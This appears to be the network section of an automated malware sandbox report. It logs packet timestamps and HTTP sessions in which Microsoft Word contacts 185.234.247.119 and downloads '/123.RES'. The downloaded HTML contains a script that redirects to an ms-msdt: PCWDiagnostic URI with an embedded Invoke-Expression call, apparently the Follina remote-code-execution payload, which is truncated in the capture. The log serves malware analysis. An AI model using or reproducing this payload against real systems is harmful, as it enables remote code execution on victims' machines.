                                                                                                                                                                                            Jun 7, 2022 19:51:26.889060974 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.889066935 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.889108896 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.889125109 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.889147997 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.889189959 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.889205933 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.889774084 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.889827013 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.889859915 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.889868975 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.889975071 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.889990091 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.890017986 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.890055895 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.890088081 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.890119076 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.890168905 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.890171051 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.890209913 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.890233994 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.890250921 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.890305042 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.890316010 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.890710115 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.890753031 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.890791893 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.890794039 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.890831947 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.890850067 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.890871048 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.890912056 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.890933990 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.890953064 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.890993118 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.891017914 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.891031981 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.891071081 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.891093969 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.891119957 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.891166925 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.891189098 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.895344019 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.895490885 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.917363882 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.917428017 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.917471886 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.917510033 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.917514086 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.917557001 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.917570114 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.917598009 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.917654991 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.918546915 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.918591022 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.918631077 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.918669939 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.918670893 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.918710947 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.918725967 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.918751955 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.918806076 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.922967911 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.923028946 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.923069954 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.923109055 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.923147917 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.923187971 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.923228979 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.923247099 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.923269987 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.923278093 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.923311949 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.923351049 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.923373938 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.923391104 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.923430920 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.923440933 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.956980944 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.957000017 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.957019091 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.957058907 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.957089901 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.957099915 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.957143068 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.957160950 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.960211992 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.960256100 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.960294962 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.960310936 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.960336924 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.960345984 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.960376978 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.960413933 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.960432053 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.960453987 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.960511923 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.960519075 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.960560083 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.960601091 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.960618019 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.960640907 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.960680008 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.960699081 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.960998058 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.961040020 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.961071014 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.961078882 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.961121082 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.961133957 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.961162090 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.961199999 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.961215019 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.961240053 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.961280107 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.961292982 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.961319923 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.961359024 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.961373091 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.961397886 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.961437941 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.961448908 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.961996078 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.962038040 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.962073088 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.962079048 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.962119102 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.962141037 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.962160110 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.962199926 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.962219954 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.962241888 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.962279081 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.962294102 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.962318897 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.962357998 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.962373972 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.962395906 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.962435961 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.962449074 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.962996006 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963038921 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963072062 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963078976 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963119030 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963135958 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963157892 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963197947 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963212967 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963234901 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963274956 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963290930 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963315964 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963355064 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963376045 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963395119 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963434935 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963449001 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963473082 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963512897 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963532925 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963557005 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963598967 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963615894 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963640928 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963680029 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963696003 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963720083 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963759899 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963777065 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963799000 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963838100 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963855028 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963875055 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:51:26.963948011 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:56.275350094 CEST4976380192.168.2.5185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:51:56.303694963 CEST8049763185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:52:31.964868069 CEST8049865185.234.247.119192.168.2.5
                                                                                                                                                                                            Jun 7, 2022 19:52:31.965503931 CEST4986580192.168.2.5185.234.247.119
                                                                                                                                                                                            • 185.234.247.119
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49744 | 185.234.247.119 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Timestamp | kBytes transferred | Direction | Data
Jun 7, 2022 19:50:11.720185995 CEST | 472 | OUT | OPTIONS / HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                                            User-Agent: Microsoft Office Word 2014
                                                                                                                                                                                            X-Office-Major-Version: 16
                                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                                            X-FeatureVersion: 1
                                                                                                                                                                                            X-MSGETWEBURL: t
                                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                                            Host: 185.234.247.119
Jun 7, 2022 19:50:11.748681068 CEST | 473 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                            Date: Tue, 07 Jun 2022 17:50:11 GMT
                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                            Content-Length: 150
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                            Jun 7, 2022 19:50:11.868760109 CEST | 483 | OUT | HEAD /123.RES HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                                            User-Agent: Microsoft Office Word 2014
                                                                                                                                                                                            X-Office-Major-Version: 16
                                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                                            X-FeatureVersion: 1
                                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                                            Host: 185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:50:11.900027037 CEST | 483 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                            Date: Tue, 07 Jun 2022 17:50:11 GMT
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Content-Length: 6241
                                                                                                                                                                                            Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            ETag: "6299dd5d-1861"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Jun 7, 2022 19:50:14.981090069 CEST | 937 | OUT | OPTIONS / HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                                            User-Agent: Microsoft Office Word 2014
                                                                                                                                                                                            X-Office-Major-Version: 16
                                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                                            X-FeatureVersion: 1
                                                                                                                                                                                            X-MSGETWEBURL: t
                                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                                            Host: 185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:50:15.009474993 CEST | 937 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                            Date: Tue, 07 Jun 2022 17:50:14 GMT
                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                            Content-Length: 150
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                            Jun 7, 2022 19:50:15.701190948 CEST | 1301 | OUT | OPTIONS / HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                                            User-Agent: Microsoft Office Word 2014
                                                                                                                                                                                            X-Office-Major-Version: 16
                                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                                            X-FeatureVersion: 1
                                                                                                                                                                                            X-MSGETWEBURL: t
                                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                                            Host: 185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:50:15.729496002 CEST | 1302 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                            Date: Tue, 07 Jun 2022 17:50:15 GMT
                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                            Content-Length: 150
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                            Jun 7, 2022 19:50:15.765372038 CEST | 1302 | OUT | HEAD /123.RES HTTP/1.1
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                                            User-Agent: Microsoft Office Word 2014
                                                                                                                                                                                            X-Office-Major-Version: 16
                                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                                            X-FeatureVersion: 1
                                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                                            Host: 185.234.247.119
                                                                                                                                                                                            Jun 7, 2022 19:50:15.793732882 CEST | 1302 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                            Date: Tue, 07 Jun 2022 17:50:15 GMT
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Content-Length: 6241
                                                                                                                                                                                            Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            ETag: "6299dd5d-1861"
                                                                                                                                                                                            Accept-Ranges: bytes


                                                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                                                                            1 | 192.168.2.5 | 49763 | 185.234.247.119 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            Timestamp | kBytes transferred | Direction | Data
                                                                                                                                                                                            Jun 7, 2022 19:50:15.090852022 CEST | 938 | OUT | GET /123.RES HTTP/1.1
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
                                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                                            Host: 185.234.247.119
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jun 7, 2022 19:50:15.119044065 CEST | 939 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                            Date: Tue, 07 Jun 2022 17:50:15 GMT
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Content-Length: 6241
                                                                                                                                                                                            Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            ETag: "6299dd5d-1861"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Data Ascii: <!doctype html><html lang="en"><head><title>Good thing we disabled macros</title></head><body><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique ante, dignissim convallis ligula. Aenean quis felis dolor. In quis lectus massa. Pellente
                                                                                                                                                                                            Jun 7, 2022 19:50:15.119088888 CEST | 940 | IN
                                                                                                                                                                                            Data Ascii: sque quis pretium massa. Vivamus facilisis ultricies massa ac commodo. Nam nec congue magna. Nullam laoreet justo ut vehicula lobortis.Aliquam rutrum orci tortor, non porta odio feugiat eu. Vivamus nulla mauris, eleifend eu egestas sceleri
                                                                                                                                                                                            Jun 7, 2022 19:50:15.119126081 CEST | 942 | IN
                                                                                                                                                                                            Data Ascii: erdum, nisl eu laoreet tempus, augue nisl volutpat odio, dictum aliquam massa orci sit amet magna.Duis pulvinar vitae neque non placerat. Nullam at dui diam. In hac habitasse platea dictumst. Sed quis mattis libero. Nullam sit amet condime
                                                                                                                                                                                            Jun 7, 2022 19:50:15.119165897 CEST | 943 | IN
                                                                                                                                                                                            Data Ascii: amet massa. Vivamus in lectus erat. Nulla facilisi. Vivamus sed massa quis arcu egestas vehicula. Nulla massa lorem, tincidunt sed feugiat quis, faucibus a risus. Sed viverra turpis sit amet metus iaculis finibus.Morbi convallis fringilla
                                                                                                                                                                                            Jun 7, 2022 19:50:15.119206905 CEST | 945 | IN
                                                                                                                                                                                            Data Ascii: , justo ac porta facilisis, mi sapien efficitur ipsum, sit fusce.</p><script> location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invo
                                                                                                                                                                                            Jun 7, 2022 19:50:15.351569891 CEST | 945 | OUT | HEAD /123.RES HTTP/1.1
                                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                                            User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                                            Host: 185.234.247.119
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jun 7, 2022 19:50:15.383161068 CEST945INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                            Date: Tue, 07 Jun 2022 17:50:15 GMT
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Content-Length: 6241
                                                                                                                                                                                            Last-Modified: Fri, 03 Jun 2022 10:07:25 GMT
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            ETag: "6299dd5d-1861"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Jun 7, 2022 19:50:15.592542887 CEST1193OUTHEAD /123.RES HTTP/1.1
                                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                                            User-Agent: Microsoft Office Existence Discovery
